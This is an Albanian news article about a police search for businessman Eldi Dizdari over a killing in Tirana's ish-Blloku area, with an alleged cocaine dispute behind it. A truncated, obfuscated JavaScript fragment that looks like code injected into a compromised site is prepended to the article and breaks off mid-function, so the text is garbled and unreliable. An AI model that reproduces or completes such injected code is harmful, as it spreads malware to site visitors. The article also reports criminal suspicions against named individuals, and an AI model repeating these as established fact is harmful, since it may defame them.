;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Vrasja në ish-bllok: Biznesmeni i shpallur në kërkim është burri i ish-Miss Shqipërisë

By

Eldi Dizdari është personi i shpallur së fundmi në kërkim nga policia, për masakrën e ndodhur më 4 tetor në zonën e ish-Bllokut, ku mbeti i vrarë Fabiol Gaxha.

Mësohet se Dizdari është bashkëshorti i moderatores Suada Sherifi, e cila ka qenë edhe miss Shqipëria disa vite më parë.

Çifti është martuar vitin e kaluar dhe kanë së bashku një vajzë të vogël.

Sa i përket ngjarjes në ish-Bllok, dyshohet se Dizdari ka patur konflikt me Ervin Matën për një sasi kokaine. Mata nuk i ka dhënë shpjegime Dizdarit për kokainën dhe këtu dyshohet se ka hyrë në lojë Ervis Martinaj.

Eldi Dizdari është gjithashtu kushëri i Arbër Çekajt, pronari i kompanisë ‘Arbri Garden’, në magazinat e të cilës u sekuestruan 613 kg kokainë, shkruan politiko.al, transmeton Prive.

Artikuj të ngjashëm